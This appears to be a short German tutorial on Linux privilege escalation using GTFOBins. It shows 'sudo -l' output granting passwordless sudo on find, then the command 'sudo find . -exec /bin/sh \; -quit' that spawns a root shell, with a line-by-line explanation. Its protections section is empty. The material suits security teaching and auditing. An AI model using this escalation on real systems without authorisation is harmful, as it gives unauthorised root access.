Linux mit GTFOBins
Hintergrund: Was ist GTFOBins?
Schritt 1: Berechtigungen prüfen
sudo -lUser john may run the following commands on base:
(ALL) NOPASSWD: /usr/bin/findSchritt 2: Passende Binary bei GTFOBins suchen
sudo find . -exec /bin/sh \; -quitErklärung des Befehls
find . # sucht im aktuellen Verzeichnis
-exec /bin/sh \; # führt /bin/sh aus (über -exec)
-quit # beendet die Suche nach erstem MatchWann ist das relevant?
Schutzmaßnahmen
Last updated